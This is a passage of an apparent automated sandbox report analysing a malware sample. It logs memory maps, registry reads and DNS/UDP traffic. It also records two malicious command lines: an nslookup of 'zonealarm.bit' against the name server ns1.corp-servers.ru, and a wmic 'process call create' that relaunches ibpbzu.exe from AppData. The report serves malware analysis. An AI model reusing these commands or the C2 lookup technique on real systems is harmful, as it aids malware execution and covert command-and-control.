nsi.dll 0x76220000 0x76226fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76240000 0x762fcfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x766b0000 0x76706fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77030000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77350000 0x774ddfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007e960000 0x7e960000 0x7ea5ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ea60000 0x7ea60000 0x7ea82fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfb2498ffff Private Memory Readable True False False -
pagefile_0x00007dfb24990000 0x7dfb24990000 0x7ffb2498ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffb24990000 0x7ffb24b6afff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb24b6b000 0x7ffb24b6b000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x8d0000 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = NQdPdE True 1
Fn
Resolve Name host = ns1.corp-servers.ru, address_out = 189.75.183.21, 94.183.71.48, 89.203.10.56, 94.249.60.127 True 1
Fn
UDP Sessions (5)
»
Information Value
Total Data Sent 168 bytes
Total Data Received 1.32 KB
Contacted Host Count 1
Contacted Hosts 189.75.183.21:53
UDP Session #1
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 581 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 581 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #4
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 191 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 191 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #5
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 581 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 581 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #28: nslookup.exe
8 16
»
Information Value
ID #28
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup zonealarm.bit ns1.corp-servers.ru
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:05:38, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:00:08
OS Process Information
»
Information Value
PID 0xe0c
Parent PID 0x1064 (c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x E04
0x 1084
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
nslookup.exe 0x008d0000 0x008e6fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000e00000 0x00e00000 0x02dfffff Pagefile Backed Memory - True False False -
private_0x0000000002e00000 0x02e00000 0x02ffffff Private Memory Readable, Writable True False False -
private_0x0000000003000000 0x03000000 0x0301ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000003000000 0x03000000 0x0300ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000003010000 0x03010000 0x03013fff Private Memory Readable, Writable True False False -
private_0x0000000003020000 0x03020000 0x03021fff Private Memory Readable, Writable True False False -
pagefile_0x0000000003020000 0x03020000 0x03021fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000003030000 0x03030000 0x03047fff Pagefile Backed Memory Readable True False False -
private_0x0000000003050000 0x03050000 0x0308ffff Private Memory Readable, Writable True False False -
private_0x0000000003090000 0x03090000 0x030cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000030d0000 0x030d0000 0x030d3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000030e0000 0x030e0000 0x030e0fff Pagefile Backed Memory Readable True False False -
private_0x00000000030f0000 0x030f0000 0x030f0fff Private Memory Readable, Writable True False False -
locale.nls 0x03100000 0x031c4fff Memory Mapped File Readable False False False -
private_0x00000000031d0000 0x031d0000 0x0320ffff Private Memory Readable, Writable True False False -
private_0x0000000003210000 0x03210000 0x0324ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000003250000 0x03250000 0x03250fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000003260000 0x03260000 0x03263fff Private Memory Readable, Writable True False False -
private_0x0000000003270000 0x03270000 0x0327ffff Private Memory Readable, Writable True False False -
private_0x00000000032b0000 0x032b0000 0x032bffff Private Memory Readable, Writable True False False -
private_0x00000000033a0000 0x033a0000 0x0349ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000034a0000 0x034a0000 0x035dcfff Pagefile Backed Memory Readable True False False -
wow64.dll 0x68d50000 0x68da0fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x68db0000 0x68db9fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x68dc0000 0x68e32fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73260000 0x7326afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73270000 0x73282fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73290000 0x732a5fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x732b0000 0x732c0fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x732d0000 0x73319fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73320000 0x73327fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73330000 0x733aefff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73c10000 0x73c5dfff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73c60000 0x73c8efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73ce0000 0x73cf7fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73e10000 0x73e19fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73e20000 0x73e3ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x758a0000 0x75a61fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75a70000 0x75ad6fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75ae0000 0x75baffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76190000 0x761d0fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76220000 0x76226fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76240000 0x762fcfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x766b0000 0x76706fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77030000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77350000 0x774ddfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007e400000 0x7e400000 0x7e4fffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007e500000 0x7e500000 0x7e522fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfb2498ffff Private Memory Readable True False False -
pagefile_0x00007dfb24990000 0x7dfb24990000 0x7ffb2498ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffb24990000 0x7ffb24b6afff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb24b6b000 0x7ffb24b6b000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x8d0000 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = NQdPdE True 1
Fn
Resolve Name host = ns1.corp-servers.ru, address_out = 189.75.183.21, 94.183.71.48, 89.203.10.56, 94.249.60.127 True 1
Fn
UDP Sessions (3)
»
Information Value
Total Data Sent 106 bytes
Total Data Received 772 bytes
Contacted Host Count 1
Contacted Hosts 189.75.183.21:53
UDP Session #1
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 191 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 191 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 581 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 581 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #31: wmic.exe
15 0
»
Information Value
ID #31
File Name c:\windows\syswow64\wbem\wmic.exe
Command Line "C:\WINDOWS\SysWOW64\wbem\wmic.exe" process call create "cmd /c start C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe"
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:05:43, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:00:03
OS Process Information
»
Information Value
PID 0x3a4
Parent PID 0x1064 (c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 3C4
0x 11B8
0x 11B0
0x 580
0x 58C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
wmic.exe 0x00220000 0x00282fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000eb0000 0x00eb0000 0x02eaffff Pagefile Backed Memory - True False False -
private_0x0000000002eb0000 0x02eb0000 0x02ecffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002eb0000 0x02eb0000 0x02ebffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002ec0000 0x02ec0000 0x02ec3fff Private Memory Readable, Writable True False False -
private_0x0000000002ed0000 0x02ed0000 0x02ed1fff Private Memory Readable, Writable True False False -
pagefile_0x0000000002ed0000 0x02ed0000 0x02ed0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000002ee0000 0x02ee0000 0x02ef7fff Pagefile Backed Memory Readable True False False -
private_0x0000000002f00000 0x02f00000 0x02f3ffff Private Memory Readable, Writable True False False -
private_0x0000000002f40000 0x02f40000 0x02f7ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002f80000 0x02f80000 0x02f83fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000002f90000 0x02f90000 0x02f90fff Pagefile Backed Memory Readable True False False -
private_0x0000000002fa0000 0x02fa0000 0x02fa0fff Private Memory Readable, Writable True False False -
private_0x0000000002fb0000 0x02fb0000 0x02feffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002ff0000 0x02ff0000 0x02ff0fff Pagefile Backed Memory Readable True False False -
private_0x0000000003000000 0x03000000 0x031fffff Private Memory Readable, Writable True False False -
private_0x0000000003200000 0x03200000 0x0323ffff Private Memory Readable, Writable True False False -
r00000000000d.clb 0x03240000 0x03245fff Memory Mapped File Readable False False False -
private_0x0000000003250000 0x03250000 0x0325ffff Private Memory Readable, Writable True False False -
private_0x0000000003260000 0x03260000 0x0326ffff Private Memory - True False False -
private_0x0000000003270000 0x03270000 0x03273fff Private Memory Readable, Writable True False False -
pagefile_0x0000000003280000 0x03280000 0x03281fff Pagefile Backed Memory Readable True False False -
private_0x0000000003290000 0x03290000 0x0329ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000032a0000 0x032a0000 0x032a0fff Pagefile Backed Memory Readable, Writable True False False -
msxml3r.dll 0x032b0000 0x032b0fff Memory Mapped File Readable False False False -
private_0x00000000032c0000 0x032c0000 0x032dffff Private Memory - True False False -
private_0x00000000032e0000 0x032e0000 0x033dffff Private Memory Readable, Writable True False False -
locale.nls 0x033e0000 0x034a4fff Memory Mapped File Readable False False False -
sortdefault.nls 0x034b0000 0x037e6fff Memory Mapped File Readable False False False -
ole32.dll 0x037f0000 0x038e1fff Memory Mapped File Readable False False False -
private_0x00000000037f0000 0x037f0000 0x039effff Private Memory Readable, Writable True False False -
private_0x00000000037f0000 0x037f0000 0x038dffff Private Memory Readable, Writable True False False -
private_0x00000000037f0000 0x037f0000 0x0385ffff Private Memory Readable, Writable True False False -
imm32.dll 0x037f0000 0x03813fff Memory Mapped File Readable False False False -
wmic.exe.mui 0x037f0000 0x037fffff Memory Mapped File Readable False False False -
private_0x0000000003800000 0x03800000 0x03800fff Private Memory Readable, Writable True False False -
private_0x0000000003810000 0x03810000 0x03810fff Private Memory Readable, Writable True False False -
pagefile_0x0000000003820000 0x03820000 0x03843fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000003820000 0x03820000 0x03833fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000003850000 0x03850000 0x0385ffff Private Memory Readable, Writable True False False -
private_0x0000000003860000 0x03860000 0x038bffff Private Memory Readable, Writable True False False -
private_0x0000000003860000 0x03860000 0x0389ffff Private Memory Readable, Writable True False False -
private_0x00000000038b0000 0x038b0000 0x038bffff Private Memory Readable, Writable True False False -
private_0x00000000038d0000 0x038d0000 0x038dffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x038e0000 0x039c5fff Memory Mapped File Readable False False False -
private_0x00000000039e0000 0x039e0000 0x039effff Private Memory Readable, Writable True False False -
private_0x00000000039f0000 0x039f0000 0x03baffff Private Memory Readable, Writable True False False -
private_0x00000000039f0000 0x039f0000 0x03b1ffff Private Memory Readable, Writable True False False -
private_0x00000000039f0000 0x039f0000 0x03aeffff Private Memory Readable, Writable True False False -
private_0x0000000003b10000 0x03b10000 0x03b1ffff Private Memory Readable, Writable True False False -
private_0x0000000003b20000 0x03b20000 0x03b5ffff Private Memory Readable, Writable True False False -
private_0x0000000003b60000 0x03b60000 0x03b9ffff Private Memory Readable, Writable True False False -
private_0x0000000003ba0000 0x03ba0000 0x03baffff Private Memory Readable, Writable True False False -
private_0x0000000003bb0000 0x03bb0000 0x03faffff Private Memory Readable, Writable True False False -
pagefile_0x0000000003fb0000 0x03fb0000 0x041b7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000041c0000 0x041c0000 0x04340fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004350000 0x04350000 0x0574ffff Pagefile Backed Memory Readable True False False -
private_0x0000000005750000 0x05750000 0x0578ffff Private Memory Readable, Writable True False False -
private_0x0000000005790000 0x05790000 0x057cffff Private Memory Readable, Writable True False False -
private_0x00000000057d0000 0x057d0000 0x0580ffff Private Memory Readable, Writable True False False -
private_0x0000000005810000 0x05810000 0x0590ffff Private Memory Readable, Writable True False False -
wow64.dll 0x68d50000 0x68da0fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x68db0000 0x68db9fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x68dc0000 0x68e32fff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x72890000 0x7294ffff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x72950000 0x7295ffff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x72960000 0x72982fff Memory Mapped File Readable, Writable, Executable False False False -
msxml3.dll 0x72990000 0x72b18fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x72b20000 0x72b87fff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x72b90000 0x72b9cfff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x72ba0000 0x72bdefff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x73250000 0x732c7fff Memory Mapped File Readable, Writable, Executable False False False -
msiso.dll 0x733b0000 0x73410fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x73420000 0x735bbfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x73670000 0x73881fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x73890000 0x73b50fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x73b60000 0x73bf2fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73c60000 0x73c8efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73ce0000 0x73cf7fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73e10000 0x73e19fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73e20000 0x73e3ffff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x73e40000 0x74077fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x740e0000 0x741d2fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x756f0000 0x75807fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x75810000 0x75892fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x758a0000 0x75a61fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75a70000 0x75ad6fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75ae0000 0x75baffff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x75c60000 0x75c6dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcp_win.dll 0x75c70000 0x75ce8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76110000 0x76134fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76140000 0x76184fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76190000 0x761d0fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76240000 0x762fcfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76300000 0x7643bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76440000 0x76460fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76610000 0x766a5fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x766b0000 0x76706fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x76710000 0x76c93fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x76e20000 0x76e96fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x76ea0000 0x76eaffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77030000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
gdi32full.dll 0x770f0000 0x77247fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x77250000 0x77294fff Memory Mapped File Readable, Writable, Executable False False False -
win32u.dll 0x772a0000 0x772b5fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x772c0000 0x7734bfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77350000 0x774ddfff Memory Mapped File Readable, Writable, Executable False False False -
sysmain.sdb 0x7e8c0000 0x7ec71fff Memory Mapped File Readable False False False -
pagefile_0x000000007ec80000 0x7ec80000 0x7ed7ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ed80000 0x7ed80000 0x7eda2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfb2498ffff Private Memory Readable True False False -
pagefile_0x00007dfb24990000 0x7dfb24990000 0x7ffb2498ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffb24990000 0x7ffb24b6afff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb24b6b000 0x7ffb24b6b000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
COM (5)
»
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create F6D90F12-9C73-11D3-B32E-00C04F990BB4 2933BF95-7B36-11D2-B20E-00C04F983E60 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli\ms_409 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\NQDPDE\ROOT\CIMV2 True 1
Fn
Registry (5)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging, data = 48 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory, data = 37 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Log File Max Size, data = 54 True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\wbem\wmic.exe base_address = 0x220000 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = NQDPDE True 1
Fn
Get Time type = Local Time, time = 2018-04-20 18:25:42 (Local Time) True 1
Fn
Get Info type = System Directory, result_out = C:\WINDOWS\system32 True 1
Fn
Process #33: svchost.exe
0 0
»
Information Value
ID #33
File Name c:\windows\system32\svchost.exe
Command Line C:\WINDOWS\system32\svchost.exe -k netsvcs
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:05:44, Reason: RPC Server
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:00:02
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x150
Parent PID 0x24c (c:\windows\system32\services.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege
Thread IDs
0x 964
0x 658
0x 2A0
0x E6C
0x 1060
0x 1018
0x 1020
0x 1030
0x 1350
0x 132C
0x 1328
0x 1324
0x 131C
0x 12E4
0x 12DC
0x 12D8
0x 12D4
0x 12CC
0x 12C4
0x 10FC
0x 9F0
0x EC0
0x EB8
0x EB4
0x EB0
0x EA8
0x EA4
0x E9C
0x A54
0x A4C
0x A48
0x A34
0x 97C
0x 8D0
0x 8AC
0x 8A4
0x 89C
0x 868
0x 864
0x 84C
0x 840
0x 838
0x 834
0x 830
0x 82C
0x 824
0x 820
0x 80C
0x 808
0x 804
0x 454
0x 788
0x 710
0x 614
0x 6DC
0x 618
0x 5C8
0x 458
0x 7D8
0x 7C4
0x 790
0x 6D4
0x 654
0x 650
0x 64C
0x 648
0x 638
0x 5B4
0x 568
0x 45C
0x 438
0x 42C
0x 420
0x 41C
0x 398
0x 370
0x 34C
0x 344
0x 324
0x 244
0x 298
0x 2A4
0x 29C
0x 188
0x 59C
0x 5E4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
